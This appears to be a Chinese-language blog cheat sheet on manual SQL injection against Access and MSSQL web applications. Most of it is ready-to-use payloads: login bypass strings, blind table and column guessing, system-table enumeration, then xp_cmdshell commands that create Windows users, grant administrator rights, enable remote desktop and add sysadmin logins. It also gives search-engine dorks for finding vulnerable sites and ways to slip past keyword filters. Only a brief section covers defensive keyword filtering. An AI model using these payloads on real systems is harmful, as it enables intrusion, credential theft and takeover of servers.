cdxy.me
Footprints on Cyber Security and Python

ACCESS+MSSQL手工注入


access注入

  • 查询语句 select * from stuinfo where name='aa' where address like "%北京朝阳区%"
  • 后台登录:万能密码 username:'or'='or'
  • 防止语句出错:注释符:– username=’()’
  • 注入判断: ’ www.xx.com/a.asp?id=1 and 1=1正常 and 1=2 错误 username:admin and 1=2
  • 判断表名:admin and (select count(*) from admin)>0
  • 判断字段名:username,password admin_user admin_pwd and (select count(admin_user) from admin)>0
  • 猜解值的长度:admin_user=5 admin_pwd=16 and (select len(admin_user) from admin)=4依次尝试
  • 猜属性值: and (select left(admin_user,1) from admin)='a' 在’ ‘中依次尝试字母数字 and (select left(admin_user,2) from admin)='ad' and (select left(admin_user,3) from admin)='adm'
  • 自动化工具: sqlmap,domain,nbsi2,hdsi,ad,sqlguess,pangolin
  • 自动挖注入漏洞: ad:批量分析注入点:www.google.com inurl:com asp+id

mssql/sqlserver注入:

  • 判断注入点: and 1=1 and 1=2
  • 猜版本: and @@version>0
  • 猜用户名: and user>0
  • 猜当前连接数据库:article and db_name()>0
  • 猜解其它数据库: and (select name from master.dbo.sysdatabases where dbid=6)>1
  • 猜第一个表名:’admin’ and (select top 1 name from sysobjects where xtype='u' and status>0 )>0
  • 猜其他表名:’t_jiaozhu’ and (select top 1 name from sysobjects where xtype='u' and status>0 and name not in('admin'))>0
  • 猜字段:username,password and (Select Top 1 col_name(object_id('admin'),1) from sysobjects)>0
  • 猜值 and (select username from admin)>0
  • 破解密码MD5或者更改密码MD5值
  • 自动化工具

后续操作

sqlserver 存储扩展应用

  • 建立系统用户: net user username pass /add
  • 系统提权 net localgroup administrators username /add
  • 打开3389 reg add "hklm\System\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d "0" /f
  • 建立数据库用户: ;exec master..sp_addlogin user,pass;--
  • 数据库提权: ;exec master..sp_addsrvrolemember aa,sysadmin;--

xp_cmdshell应用

  • 建立系统用户 ;exec master..xp_cmdshell "net user bb bb /add"--
  • 防止xp_cmdshell: ;exec master..sp_dropextendedproc 'xp_cmdshell'
  • 恢复xp_cmdshell ;exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'
  • 彻底防溢出 c:\windows\system32\cmd.exe 删除所有默认权限. 添加administrator–完全控制

防御:

  • 防注入的脚本:
  • 过滤关键字: and select update or union post get cookie
  • 在有漏洞脚本调用防注入的脚本: <!--#Include File="noinject.asp"--> conn.asp config.php

绕过:

  • 大小写转换:select sElect
  • 用urlencode编码:s%65%6C%65%63%74
  • hex:十六进制0x616E64
  • = and 1<2 union